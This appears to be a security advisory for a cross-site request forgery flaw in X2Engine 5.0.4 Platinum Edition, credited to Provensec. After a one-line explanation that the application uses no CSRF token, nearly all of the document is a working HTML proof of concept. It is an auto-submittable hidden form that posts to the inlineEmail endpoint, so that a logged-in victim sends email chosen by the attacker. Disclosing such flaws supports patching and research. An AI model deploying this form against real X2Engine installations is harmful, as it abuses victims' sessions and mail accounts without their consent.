X2Engine 5.0.4 Platinum Edition Cross Site Request Forgery

`# Affected software: x2 engine  
# Type of vulnerability: csrf  
# URL: http://demo.x2engine.com  
# Discovered by: Provensec  
# Website: http://www.provensec.com  
  
#version :*X2Engine 5.0.4 Platinum Edition*  
# Proof of concept  
  
x2 engine was not using any csrf token which causes a csrf issue which an  
attacker can use to send emails  
  
<html>  
  
<body>  
<form action="  
http://demo.x2engine.com/index.php/emailInboxes/inlineEmail?ajax=1&postReplace=0&contactFlag=1&skipEvent=0"  
method="POST">  
<input type="hidden" name="InlineEmail[modelId]" value="" />  
<input type="hidden" name="associationType" value="EmailInboxes" />  
<input type="hidden" name="InlineEmail[modelName]" value="" />  
<input type="hidden" name="contactFlag" value="1" />  
<input type="hidden" name="InlineEmail[credId]" value="1" />  
<input type="hidden" name="InlineEmail[to]"  
value="test@tes" />  
<input type="hidden" name="InlineEmail[cc]" value="" />  
<input type="hidden" name="InlineEmail[bcc]" value="" />  
<input type="hidden" name="InlineEmail[subject]"  
value="test@tes" />  
<input type="hidden" name="InlineEmail[message]"  
value="test@tes" />  
<input type="hidden"  
name="InlineEmail[emailInboxesEmailSync]" value="0" />  
<input type="hidden"  
name="InlineEmail[emailInboxesEmailSync]" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
`